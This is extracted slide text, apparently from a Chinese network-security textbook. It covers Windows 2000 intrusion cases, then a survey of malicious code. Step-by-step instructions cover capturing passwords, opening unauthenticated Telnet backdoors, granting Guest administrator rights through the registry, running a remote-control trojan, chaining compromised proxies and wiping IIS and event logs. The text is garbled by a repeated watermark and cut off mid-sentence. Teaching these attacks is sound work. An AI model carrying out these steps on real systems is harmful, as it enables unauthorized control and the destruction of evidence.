首先在對方操作系統(tǒng)中執(zhí)行Win2KPass.exe文件，當(dāng)對方主機(jī)管理員密碼修改并重啟計算機(jī)以后，就在

Winnt\temp目錄下產(chǎn)生一個ini文件，如圖6-7所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書案例6-3建立Web服務(wù)和Telnet服務(wù)

使用工具軟件wnc.exe可以在對方的主機(jī)上開啟兩個服務(wù)：

Web服務(wù)和Telnet服務(wù)。其中Web服務(wù)的端口是808，Telnet服務(wù)的端口是707。執(zhí)行很簡單，只要在對方的命令行下執(zhí)行一下wnc.exe就可以，如圖6-9所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書測試Web服務(wù)

首先測試Web服務(wù)808端口，在瀏覽器地址欄中輸入

“09:808”，出現(xiàn)主機(jī)的盤符列表，如圖6-11所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書看密碼修改記錄文件

可以下載對方硬盤設(shè)置光盤上的任意文件（對于漢字文件名的文件下載有問題），可以到Winnt/temp目錄下查看對方密碼修改記錄文件，如圖6-12所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書利用telnet命令連接707端口

可以利用“telnet

09

707”命令登錄到對方的命令行，執(zhí)行的方法如圖6-13所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書登錄到對方的命令行

不用任何的用戶名和密碼就可以登錄對對方主機(jī)的命令行，如圖6-14所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書案例6-4讓禁用的Guest具有管理權(quán)限

操作系統(tǒng)所有的用戶信息都保存在注冊表中，但是如果直接使用“regedit”命令打開注冊表，該鍵值是隱藏的。

可以利用工具軟件psu.exe得到該鍵值的查看和編輯權(quán)。將

psu.exe拷貝對方主機(jī)的C盤下，并在任務(wù)管理器查看對方

主機(jī)winlogon.exe進(jìn)程的ID號或者使用pulist.exe文件查看該進(jìn)程的ID號，如圖6-18所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書執(zhí)行命令

該進(jìn)程號為192，下面執(zhí)行命令“psu-p

regedit-i

pid”其中pid為Winlogon.exe的進(jìn)程號，如圖6-19所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書查看帳戶對應(yīng)的鍵值

查看Administrator和guest默認(rèn)的鍵值，在Windows2000操作系統(tǒng)上，Administrator一般為0x1f4，guest一般為0x1f5，如圖6-21所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書拷貝管理員配置信息

在圖6-22右邊欄目中的F鍵值中保存了帳戶的密碼信息，雙擊“000001F4”目錄下鍵值“F”，可以看到該鍵值的二進(jìn)制信息，將這些二進(jìn)制信息全選，并拷貝到出來，如圖6-23所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書覆蓋Guest用戶的配置信息

將拷貝出來的信息全部覆蓋到“000001F5”目錄下的“F”鍵值中，如圖6-24所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書保存鍵值Guest帳戶已經(jīng)具有管理員權(quán)限了。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書連接終端服務(wù)的軟件

終端服務(wù)是Windows操作系統(tǒng)自帶的，可以遠(yuǎn)程通過圖形界面操縱服務(wù)器。在默認(rèn)的情況下終端服務(wù)的端口號是3389。可以在系統(tǒng)服務(wù)中查看終端服務(wù)是否啟動，如圖6-31所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書連接到終端服務(wù)等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

管理員為了遠(yuǎn)程操作方便，服務(wù)器上的該服務(wù)一般都是開啟的。這就給黑客們提供一條可以遠(yuǎn)程圖形化操作主機(jī)的途徑。利用該服務(wù)，目前常用的有三種方法連接到對方主機(jī)：1、使用Windows

2000的遠(yuǎn)程桌面連接工具。2、使用Windows

XP的遠(yuǎn)程桌面連接工具。3、使用基于瀏覽器方式的連接工具。木馬等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書木馬是一種可以駐留在對方系統(tǒng)中的一種程序。木馬一般由兩部分組成：服務(wù)器端和客戶端。

駐留在對方服務(wù)器的稱之為木馬的服務(wù)器端，遠(yuǎn)程的可以連到木馬服務(wù)器的程序稱之為客戶端。

木馬的功能是通過客戶端可以操縱服務(wù)器，進(jìn)而操縱對方的主機(jī)。木馬和后門的區(qū)別等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

木馬程序在表面上看上去沒有任何的損害，實際上隱藏著可以控制用戶整個計算機(jī)系統(tǒng)、打開后門等危害系統(tǒng)安全的功能。

木馬來自于“特洛伊木馬”，英文名稱為TrojanHorse。傳說希臘人圍攻特洛伊城，久久不能攻克，后來軍師想出了一個特洛伊木馬計，讓士兵藏在巨大的特洛伊木馬中部隊假裝撤退而將特洛伊木馬丟棄在特洛伊城下，讓敵人將其作為戰(zhàn)利品拖入城中，到了夜里，特洛伊木馬內(nèi)的士兵便趁著夜里敵人慶祝勝利、放松警惕的時候從特洛伊木馬里悄悄地爬出來，與城外的部隊里應(yīng)外合攻下了特洛伊城。由于特洛伊木馬程序的功能和此類似，故而得名。常見木馬的使用

常見的簡單得木馬有NetBus遠(yuǎn)程控制、“冰河”木馬、PCAnyWhere遠(yuǎn)程控制等等。這里介紹一種最常見的木馬程序：“冰河”。案例6-7使用“冰河”進(jìn)行遠(yuǎn)程控制

“冰河”包含兩個程序文件，一個是服務(wù)器端，另一個是客戶端?！氨?.2”得文件列表如圖6-33所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書“冰河”的客戶端

win32.exe文件是服務(wù)器端程序，Y_Client.exe文件為客戶端程序。將win32.exe文件在遠(yuǎn)程得計算機(jī)上執(zhí)行以后，通過Y_Client.exe文件來控制遠(yuǎn)程得服務(wù)器，客戶端的主界面如圖6-34所示等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書網(wǎng)絡(luò)代理跳板

當(dāng)從本地入侵其他主機(jī)的時候，自己的IP會暴露給對方。通過將某一臺主機(jī)設(shè)置為代理，通過該主機(jī)再入侵其他主機(jī)，這樣就會留下代理的IP地址，這樣就可以有效的保護(hù)自己的安全。二級代理的基本結(jié)構(gòu)如圖

6-41所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書本地通過兩級代理入侵某一臺主機(jī)，這樣在被入侵的主機(jī)上，就不會留下的自己的信息?？梢赃x擇更多的代理級別，但是考慮到網(wǎng)絡(luò)帶寬的問題，一般選擇兩到三級代理比較合適。

選擇代理服務(wù)的原則是選擇不同地區(qū)的主機(jī)作為代理。比如現(xiàn)在要入侵北美的某一臺主機(jī)，選擇南非的某一

臺主機(jī)作為一級代理服務(wù)器，選擇北歐的某一臺計算

機(jī)作為二級代理，再選擇南美的一臺主機(jī)作為三級代

理服務(wù)器，這樣很安全了。

可以選擇做代理的主機(jī)有一個先決條件，必須先安裝相關(guān)的代理軟件，一般都是將已經(jīng)被入侵的主機(jī)作為代理服務(wù)器。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書網(wǎng)絡(luò)代理跳板工具的使用等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

常用的網(wǎng)絡(luò)代理跳板工具很多，這里介紹一種比較常用而且功能比較強(qiáng)大的代理工具：Snake代理跳板。

Snake的代理跳板，支持TCP/UDP代理，支持多個（最多達(dá)到255）跳板。

程序文件為：SkSockServer.exe，代理方式為Sock5，并自動打開默認(rèn)端口1813.監(jiān)聽。清除日志等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

電影中通常會出現(xiàn)這樣的場景，當(dāng)有黑客入侵計算機(jī)系統(tǒng)的時候，需要全樓停電來捉住黑客，為什么停電就可以逮住黑客呢？這是因為當(dāng)黑

客入侵系統(tǒng)并在退出系統(tǒng)之前都會清除系統(tǒng)的

日志，如果突然停電，黑客將沒有機(jī)會刪除自

己入侵的痕跡，所以就可以抓住黑客了。

清除日志是黑客入侵的最后的一步，黑客能做到來無蹤去無影，這一步起到?jīng)Q定性的作用。清除IIS日志

當(dāng)用戶訪問某個IIS服務(wù)器以后，無論是正常的訪問還是非正常的訪問，IIS都會記錄訪問者的IP地址以及訪問時間等信息。這些信息記錄在

Winnt\System32\logFiles目錄下，如圖6-55所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書清除IIS日志等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

最簡單的方法是直接到該目錄下刪除這些文件夾，但是全部刪除文件以后，一定會引起管理員的懷疑。

一般入侵的過程是短暫的，只會保存到一個

Log文件，只要在該Log文件刪除所有自己的記錄就可以了。清除IIS日志的全過程

使用工具軟件CleanIISLog.exe可以做到這一點，首先將該文件拷貝到日志文件所在目錄，然后執(zhí)行命令“CleanIISLog.exe

ex031108.log10”，第一個參數(shù)ex031108.log是日志文件名，文件名的后六位代表年月日，第二個參數(shù)是要在該Log文件中刪除的IP地址，也就是自己的IP地址。先查找當(dāng)前目錄下的文件，然后做清楚的操作，整個清除的過程如圖6-57所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書清除主機(jī)日志

主機(jī)日志包括三類的日志：應(yīng)用程序日志、安全日志和系統(tǒng)日志。可以在計算機(jī)上通過控制面板下的“事件查看器”查看日志信息，如圖6-58所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書清除主機(jī)日志使用工具軟件clearel.exe，可以方便的清除系統(tǒng)日志，首先將該文件上傳到對方主機(jī)，然后刪除這三種日志的命令格式為：Clearel

SystemClearel

SecurityClearel

ApplicationClearel

All這四條命令分別刪除系統(tǒng)日志、安全日志、應(yīng)用程序日志和刪除全部日志。命令執(zhí)行的過程如圖6-59所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書第7章惡意代碼7等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書7.1惡意代碼概述等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

代碼是指計算機(jī)程序代碼，可以被執(zhí)行完成特定功能。任何食物事物都有正反兩面，人類發(fā)

明的所有工具既可造福也可作孽，這完全取決

于使用工具的人。計算機(jī)程序也不例外，軟件

工程師們編寫了大量的有用的軟件（操作系統(tǒng)，應(yīng)用系統(tǒng)和數(shù)據(jù)庫系統(tǒng)等）的同時，黑客們在

編寫編寫擾亂社會和他人的計算機(jī)程序，這些

代碼統(tǒng)稱為惡意代碼（Malicious

Codes）。7.1.1研究惡意代碼的必要性等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

在Internet安全事件中，惡意代碼造成的經(jīng)濟(jì)損失占有最大的比例。惡意代碼主要包括計算機(jī)病毒（Virus）、蠕蟲（Worm）、木馬程序（Trojan

Horse）、后門程序（Backdoor）、邏輯炸彈（LogicBomb）等等。與此同時，惡意代碼成為信息戰(zhàn)、網(wǎng)絡(luò)戰(zhàn)的重要手段。日益嚴(yán)重的惡意代碼問題，不僅使企業(yè)及用戶蒙受了巨大經(jīng)濟(jì)損失，而且使國家的安全面臨著嚴(yán)重威脅。惡意代碼的發(fā)展

目前，惡意代碼問題成為信息安全需要解決的，迫在眉睫的、刻不容緩的安全問題。圖7-1顯示了過去20多年主要惡意代碼事件。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書惡意代碼長期存在的原因系統(tǒng)漏洞層出不窮

AT&T實驗室的S.Bellovin曾經(jīng)對美國CERT（ComputerEmergency

Response

Team）提供的安全報告進(jìn)行過分析，分析

結(jié)果表明，大約50%的計算機(jī)網(wǎng)絡(luò)安全問題是由軟件工程中產(chǎn)生的安全缺陷引起的很多問題的根源都來自于操作系統(tǒng)的安全脆弱性利益驅(qū)使等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書惡意代碼實現(xiàn)機(jī)理

早期惡意代碼的主要形式是計算機(jī)病毒。80年代，Cohen設(shè)計出一種在運行過程中可以復(fù)制自身的破壞性程序，Adleman將它命名為計算機(jī)病毒，它是早期惡意代碼的主要內(nèi)容。

Adleman把病毒定義為一個具有相同性質(zhì)的程序集合，只要程序具有破壞、傳染或模仿的特點，就可認(rèn)為是計算機(jī)病毒。

這種定義有將病毒內(nèi)涵擴(kuò)大化的傾向，將任何具有破壞作用的程序都認(rèn)為是病毒，掩蓋了病毒潛伏、傳染等學(xué)校計等算其機(jī)它重科要學(xué)特征與技術(shù)叢書等學(xué)惡意代碼的相關(guān)定義惡意代碼類型定義特點計算機(jī)病毒指編制或者在計算機(jī)程序中插入的破壞計算機(jī)功能或者毀壞數(shù)據(jù)，影響計算機(jī)使用，并能自我復(fù)制的一組計算機(jī)指令或者程序代碼。潛伏、傳染和破壞計算機(jī)蠕蟲指通過計算機(jī)網(wǎng)絡(luò)自我復(fù)制，消耗系統(tǒng)資源和網(wǎng)絡(luò)資源的程序掃描、攻擊和擴(kuò)散特洛伊木馬指一種與遠(yuǎn)程計算機(jī)建立連接，使遠(yuǎn)程計算機(jī)能夠通過網(wǎng)絡(luò)控制本地計算機(jī)的程序。欺騙、隱蔽和信息竊取邏輯炸彈指一段嵌入計算機(jī)系統(tǒng)程序的，通過特殊的數(shù)據(jù)或時間作為條件觸發(fā)，試圖完成一定破壞功能的程序。潛伏和破壞病菌指不依賴于系統(tǒng)軟件，能夠自我復(fù)制和傳播，以消耗系統(tǒng)資源為目的的程序。傳染和拒絕服務(wù)用戶級RootKit指通過替代或者修改被系統(tǒng)管理員或普通用戶執(zhí)行的程序進(jìn)入系統(tǒng)，從而實現(xiàn)隱藏和創(chuàng)建后門的程序。隱蔽，潛伏核心級RootKit校計算機(jī)指嵌入操作系統(tǒng)內(nèi)核進(jìn)行隱藏和創(chuàng)建后門的程序科學(xué)與技術(shù)叢書隱蔽，潛伏惡意代碼攻擊機(jī)制等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書常見的惡意代碼等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

這里主要介紹幾類種惡意代碼：PE病毒、腳本病毒、宏病毒、瀏覽器惡意代碼、U盤病毒和網(wǎng)絡(luò)蠕蟲。PE病毒等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書計算機(jī)病毒發(fā)展初期因為個人操作系統(tǒng)大多為DOS系統(tǒng)，這一時期大多為DOS病毒。由于Windows的廣泛使用，DOS病毒幾乎絕跡。但DOS病毒在Win9X環(huán)境中仍可以發(fā)生感染，因此若執(zhí)行染毒文件，Windows用戶也會被感染。DOS系統(tǒng)病毒主要分成三類：引導(dǎo)型病毒，文件型病毒，以及混合引導(dǎo)型和文件型的病毒。Win32指的是32位Windows操作系統(tǒng)，Win32的可執(zhí)行文件，如*.exe、*.dll、*.ocx等，都是PE(Portable

Executable)格式文件，意思是可移植的執(zhí)行體。感染PE格式文件的Win32病毒，簡稱為PE病毒。它感染W(wǎng)indows下所有PE格式文件，因為它通常采用Win32匯編編寫，而且格式為PE，因此得名。腳本病毒等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書腳本（Script）病毒是以腳本程序語言編寫而成的病毒，主要使用的腳本語言是VBScript和JavaScript。VBScript是Visual

Basic

Script的簡稱，即Visual

Basic腳本語言，有時也被縮寫為VBS。因為VBScript是微軟公司出品的腳本語言，因此

Windows下大部分腳本病毒都使用VBS編寫。例如，愛蟲病毒、

新歡樂時光病毒等都是用VBScript編寫的，稱做VBS腳本病毒。腳本病毒編寫比較簡單，并且編寫的病毒具有傳播快、破壞力大等特點。但腳本病毒必須通過Microsoft的WSH(Windows

Scripting

Host，Windows腳本宿主)才能夠啟動執(zhí)行以及感染其他文件。腳本病毒等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

VBS病毒流行的另一個原因是，VBS程序在Windows

環(huán)境下運行非常方便，在文本文件中輸入代碼，將文件的保存為“*.VBS”，雙擊就可以執(zhí)行。例如在在文本文件中輸入：MsgBox"Hello

VBS"，保存成“a.vbs”，雙擊就可以執(zhí)行

曾經(jīng)廣為流傳的“新歡樂時光”病毒，將自己的代碼附加在HTML文件的尾部，并在頂部加入一條調(diào)用病毒代碼的語句。這里實現(xiàn)該病毒的部分感染功能，只感染病毒所在目錄下的所有HTML文件，在HTML文件后面加上代碼。宏病毒等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書宏病毒是單獨的一類病毒，因為它與傳統(tǒng)的病毒有很大的不同，他不感染.EXE、.COM等可執(zhí)行文件，而是將病毒代碼以“宏”

的形式潛伏在Office文檔中，當(dāng)采用Office軟件打開這些染毒文件時，這些代碼就會被執(zhí)行并產(chǎn)生破壞作用。由于“宏”是使用

VBA(Visual

Basic

For

Application)這樣的高級語言寫的，因此其編寫過程相對來說也比較簡單，而功能又十分強(qiáng)大。宏病毒的產(chǎn)生標(biāo)志著制造病毒不再是專業(yè)程序員的專利，任何人只要掌握一些基本的“宏”編寫技巧即可編寫出破壞力極大的宏病毒。隨著Office軟件在全世界的不斷普及，宏病毒成為傳播最廣泛、危害最大的一類病毒。瀏覽器惡意代碼等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書搜索引擎公司Google曾公布一組調(diào)